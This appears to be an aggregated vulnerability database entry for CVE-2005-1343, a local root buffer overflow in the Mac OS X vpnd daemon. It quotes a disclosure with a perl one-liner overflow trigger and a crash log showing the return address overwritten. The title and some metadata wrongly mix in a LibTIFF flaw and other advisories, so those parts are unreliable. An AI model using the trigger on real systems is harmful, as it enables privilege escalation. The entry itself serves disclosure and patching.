Sign-up

ID

VAR-200505-0311


CVE

CVE-2005-1343


TITLE

LibTIFF vulnerable to integer overflow via corrupted directory entry count

Trust: 0.8

sources: CERT/CC: VU#125598

DESCRIPTION

Stack-based buffer overflow in the VPN daemon (vpnd) for Mac OS X before 10.3.9 allows local users to execute arbitrary code via a long -i (Server_id) argument. An integer overflow in LibTIFF may allow a remote attacker to execute arbitrary code. The vulnerability presents itself when the application handles excessive string values supplied through the '-i' command line parameter. An attacker can gain superuser privileges by exploiting this issue. Due to the availability of more information, this issue is being assinged a new BID. This bug can be easily exploited to gain root access. This vulnerability has CVE ID CAN-2005-1343. Exploitation ------------ The overflow can only be exploited on a system having vpnd configured as a server. The following shows a NON-exploitable vpnd installation: host:/tmp root# vpnd -i bla 2005-05-04 15:12:54 CEST VPND: could not get servers dictionary 2005-05-04 15:12:54 CEST VPND: error processing prefs file This is due to the non-existance of /var/db/SystemConfiguration/com.apple.RemoteAccessServers.plist. Anyway, on an exploitable system you'd get: host:/tmp root# vpnd -i `perl -e 'print "A"x600'` 2005-05-04 15:16:41 CEST VPND: Server ID 'AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' invalid Segmentation fault The crashlog /Library/Logs/CrashReporter/vpnd.crash.log shows: OS Version: 10.3.7 (Build 7S215) Report Version: 2 Command: vpnd Path: /usr/sbin/vpnd Version: ??? (???) PID: 12690 Thread: 0 Exception: EXC_BAD_ACCESS (0x0001) Codes: KERN_INVALID_ADDRESS (0x0001) at 0x41414140 Thread 0 Crashed: PPC Thread State: srr0: 0x41414140 srr1: 0x4200f030 vrsave: 0x00000000 cr: 0x24000242 xer: 0x00000004 lr: 0x41414141 ctr: 0x900010a0 r0: 0x41414141 r1: 0xbffffbf0 r2: 0xa0192b50 r3: 0xffffffff r4: 0x00300950 r5: 0x00402004 r6: 0x00402004 r7: 0x00000001 r8: 0x0000000f r9: 0xa00011ac r10: 0x00000013 r11: 0x44000244 r12: 0x900010a0 r13: 0x00000000 r14: 0x00000000 r15: 0x00000000 r16: 0x00000000 r17: 0x00000000 r18: 0x00000000 r19: 0x00000000 r20: 0x00000000 r21: 0x00000000 r22: 0x00000000 r23: 0x00000000 r24: 0x00000000 r25: 0x00000000 r26: 0xbffffce4 r27: 0x00000014 r28: 0x41414141 r29: 0x41414141 r30: 0x41414141 r31: 0x41414141 Fix --- Apply Security Update 2005-005 (which fixes quite a few other bugs, too), remove the suid bit or remove the above mentioned config file. More information about said security update can be found at: http://docs.info.apple.com/article.html?artnum=301528 -- Pieter de Boer

Trust: 4.23

sources: NVD: CVE-2005-1343 // CERT/CC: VU#125598 // CERT/CC: VU#356070 // CERT/CC: VU#539110 // CERT/CC: VU#706838 // BID: 13488 // VULHUB: VHN-12552 // PACKETSTORM: 39081

AFFECTED PRODUCTS

vendor:apple computermodel: - scope: - version: -

Trust: 3.2

vendor:red hatmodel: - scope: - version: -

Trust: 1.6

vendor:applemodel:mac os x serverscope:eqversion:10.3.9

Trust: 1.6

vendor:applemodel:mac os xscope:eqversion:10.3.9

Trust: 1.6

vendor:debianmodel: - scope: - version: -

Trust: 0.8

vendor:freebsdmodel: - scope: - version: -

Trust: 0.8

vendor:sun microsystemsmodel: - scope: - version: -

Trust: 0.8

vendor:applemodel:mac os serverscope:eqversion:x10.4.1

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.4

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.3.9

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.3.8

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.3.7

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.3.6

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.3.5

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.3.4

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.3.3

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.3.2

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.3.1

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.3

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.4.1

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.4

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.3.9

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.3.8

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.3.7

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.3.6

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.3.5

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.3.4

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.3.3

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.3.2

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.3.1

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.3

Trust: 0.3

sources: CERT/CC: VU#125598 // CERT/CC: VU#356070 // CERT/CC: VU#539110 // CERT/CC: VU#706838 // BID: 13488 // CNNVD: CNNVD-200505-868 // NVD: CVE-2005-1343

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2005-1343
value: HIGH

Trust: 1.0

CARNEGIE MELLON: VU#125598
value: 7.75

Trust: 0.8

CARNEGIE MELLON: VU#356070
value: 22.31

Trust: 0.8

CARNEGIE MELLON: VU#539110
value: 5.04

Trust: 0.8

CARNEGIE MELLON: VU#706838
value: 9.38

Trust: 0.8

CNNVD: CNNVD-200505-868
value: HIGH

Trust: 0.6

VULHUB: VHN-12552
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2005-1343
severity: HIGH
baseScore: 7.2
vectorString: AV:L/AC:L/AU:N/C:C/I:C/A:C
accessVector: LOCAL
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 3.9
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.0

VULHUB: VHN-12552
severity: HIGH
baseScore: 7.2
vectorString: AV:L/AC:L/AU:N/C:C/I:C/A:C
accessVector: LOCAL
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 3.9
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: CERT/CC: VU#125598 // CERT/CC: VU#356070 // CERT/CC: VU#539110 // CERT/CC: VU#706838 // VULHUB: VHN-12552 // CNNVD: CNNVD-200505-868 // NVD: CVE-2005-1343

PROBLEMTYPE DATA

problemtype:NVD-CWE-Other

Trust: 1.0

sources: NVD: CVE-2005-1343

THREAT TYPE

local

Trust: 0.9

sources: BID: 13488 // CNNVD: CNNVD-200505-868

TYPE

buffer overflow

Trust: 0.6

sources: CNNVD: CNNVD-200505-868

EXPLOIT AVAILABILITY

sources:
            
            
            VULHUB: VHN-12552

EXTERNAL IDS
db:CERT/CCid:VU#706838
Trust: 2.5
db:SECUNIAid:15227
Trust: 2.4
db:NVDid:CVE-2005-1343
Trust: 2.1
db:USCERTid:TA05-136A
Trust: 1.7
db:SECUNIAid:13607
Trust: 1.6
db:CERT/CCid:VU#125598
Trust: 0.8
db:OSVDBid:16084
Trust: 0.8
db:BIDid:13502
Trust: 0.8
db:CERT/CCid:VU#356070
Trust: 0.8
db:SECTRACKid:1012651
Trust: 0.8
db:CERT/CCid:VU#539110
Trust: 0.8
db:OSVDBid:16085
Trust: 0.8
db:SECTRACKid:1013887
Trust: 0.8
db:CNNVDid:CNNVD-200505-868
Trust: 0.7
db:APPLEid:APPLE-SA-2005-05-03
Trust: 0.6
db:APPLEid:APPLE-SA-2005-06-08
Trust: 0.6
db:CERT/CCid:TA05-136A
Trust: 0.6
db:BIDid:13488
Trust: 0.3
db:PACKETSTORMid:39081
Trust: 0.2
db:VULHUBid:VHN-12552
Trust: 0.1
sources:
            
            
            CERT/CC: VU#125598 // 
            
            
            
            CERT/CC: VU#356070 // 
            
            
            
            CERT/CC: VU#539110 // 
            
            
            
            CERT/CC: VU#706838 // 
            
            
            
            VULHUB: VHN-12552 // 
            
            
            
            BID: 13488 // 
            
            
            
            PACKETSTORM: 39081 // 
            
            
            
            CNNVD: CNNVD-200505-868 // 
            
            
            
            NVD: CVE-2005-1343

REFERENCES
url:http://secunia.com/advisories/15227/
Trust: 2.4
url:http://docs.info.apple.com/article.html?artnum=301528
Trust: 1.7
url:http://lists.apple.com/archives/security-announce/2005/may/msg00001.html
Trust: 1.7
url:http://lists.apple.com/archives/security-announce/2005/jun/msg00000.html
Trust: 1.7
url:http://www.us-cert.gov/cas/techalerts/ta05-136a.html
Trust: 1.7
url:http://www.kb.cert.org/vuls/id/706838
Trust: 1.7
url:http://secunia.com/advisories/13607/
Trust: 1.6
url:http://www.idefense.com/application/poi/display?id=174&type=vulnerabilities
Trust: 0.8
url:http://remahl.se/david/vuln/011/
Trust: 0.8
url:http://www.securityfocus.com/bid/13502/
Trust: 0.8
url:http://www.osvdb.org/displayvuln.php?osvdb_id=16084
Trust: 0.8
url:http://securitytracker.com/alerts/2004/dec/1012651.html
Trust: 0.8
url:http://www.idefense.com/application/poi/display?id=173&type=vulnerabilities
Trust: 0.8
url:http://www.idefense.com/application/poi/display?id=240&type=vulnerabilities
Trust: 0.8
url:http://www.securityfocus.org/bid/13488
Trust: 0.8
url:http://www.securitytracker.com/alerts/2005/may/1013887.html
Trust: 0.8
url:http://www.osvdb.org/displayvuln.php?osvdb_id=16085
Trust: 0.8
url:http://www.idefense.com/intelligence/vulnerabilities/display.php?type=vulnerabilities&id=240
Trust: 0.3
url:http://www.apple.com
Trust: 0.3
url: - 
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2005-1343
Trust: 0.1
sources:
            
            
            CERT/CC: VU#125598 // 
            
            
            
            CERT/CC: VU#356070 // 
            
            
            
            CERT/CC: VU#539110 // 
            
            
            
            CERT/CC: VU#706838 // 
            
            
            
            VULHUB: VHN-12552 // 
            
            
            
            BID: 13488 // 
            
            
            
            PACKETSTORM: 39081 // 
            
            
            
            CNNVD: CNNVD-200505-868 // 
            
            
            
            NVD: CVE-2005-1343

CREDITS
Pieter de Boer  pieter@os3.nl
Trust: 0.6
sources:
            
            
            CNNVD: CNNVD-200505-868

SOURCES
db:CERT/CCid:VU#125598
db:CERT/CCid:VU#356070
db:CERT/CCid:VU#539110
db:CERT/CCid:VU#706838
db:VULHUBid:VHN-12552
db:BIDid:13488
db:PACKETSTORMid:39081
db:CNNVDid:CNNVD-200505-868
db:NVDid:CVE-2005-1343

LAST UPDATE DATE
2025-04-30T21:31:48.159000+00:00

SOURCES UPDATE DATE
db:CERT/CCid:VU#125598date:2005-05-12T00:00:00
db:CERT/CCid:VU#356070date:2005-05-16T00:00:00
db:CERT/CCid:VU#539110date:2005-08-23T00:00:00
db:CERT/CCid:VU#706838date:2005-05-24T00:00:00
db:VULHUBid:VHN-12552date:2008-09-05T00:00:00
db:BIDid:13488date:2009-07-12T14:06:00
db:CNNVDid:CNNVD-200505-868date:2005-10-20T00:00:00
db:NVDid:CVE-2005-1343date:2025-04-03T01:03:51.193

SOURCES RELEASE DATE
db:CERT/CCid:VU#125598date:2005-01-11T00:00:00
db:CERT/CCid:VU#356070date:2005-05-06T00:00:00
db:CERT/CCid:VU#539110date:2005-01-20T00:00:00
db:CERT/CCid:VU#706838date:2005-05-16T00:00:00
db:VULHUBid:VHN-12552date:2005-05-03T00:00:00
db:BIDid:13488date:2005-05-03T00:00:00
db:PACKETSTORMid:39081date:2005-08-06T06:41:23
db:CNNVDid:CNNVD-200505-868date:2005-05-03T00:00:00
db:NVDid:CVE-2005-1343date:2005-05-03T04:00:00